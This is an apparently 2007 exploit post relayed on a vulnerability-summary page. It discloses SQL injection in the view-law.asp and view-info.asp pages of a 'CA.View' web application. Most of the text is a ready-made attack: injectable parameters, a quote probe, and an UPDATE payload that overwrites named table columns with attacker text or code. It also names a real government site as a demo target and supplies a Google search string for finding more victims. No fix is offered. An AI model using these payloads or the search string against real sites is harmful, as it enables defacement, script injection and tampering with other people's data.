Related information

Daily web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)

Education_info/edu_vi ew.asp sql injection

Shoutbox 1.0 Remote Command Execution Vulnerability

Coppermine Photo Gallery (yabbse.inc. php) Remote File Inclusion Vulnerability

[Aria-Security.net] SAS Hotel Management System SQL Injection

From:	okan alp <codexploder_(at)_hotmail.com>
Date:	10.08.2007
Subject:	CA.View/view-law.asp/view-info.asp sql injection

CA.View/view-law.asp/view-info.asp sql injection


Credit    : CodeXpLoder'tq

mail      : codexploder[at]hotmail[dot]com

site      : Biyosecurity.net,expw0rm.com

thx       : BiyoSecurityTeam all members thx 3APA3A

spec.note : "Live The Life"

ooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooo
oo

1-)  example.com/[patch]/view-law.asp?lawid=(sql methot)

1-)  example.com/[patch]/view-info.asp?informationid=(sql methot)

2-)  example.com/ca/view-law.asp?lawid=(sql methot)

2-)  example.com/ca/view-info.asp?informationid=(sql methot)

ooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooo
oo

3-)  example.com/[patch]/view-law.asp?lawid=1'

3-)  example.com/[patch]/view-info.asp?informationid=1'

4-)  example.com/ca/view-law.asp?lawid=1,2,3,4,
5+update+tbl+set+column='your text or meta code';--

4-)  example.com/ca/view-info.asp?informationid=1,2,3,4,
5+update+tbl+set+column='your text or meta code';--



#tbl(law)    : tbllaw          #tbl(info)       :tblinformation
#column      : lawdetail       #column          :title

#################################################################################
####


demo site   : www.mrd.go.th/home

google  : inurl:/ac/view-law.asp?lawid or /AC/view-info.asp?informationid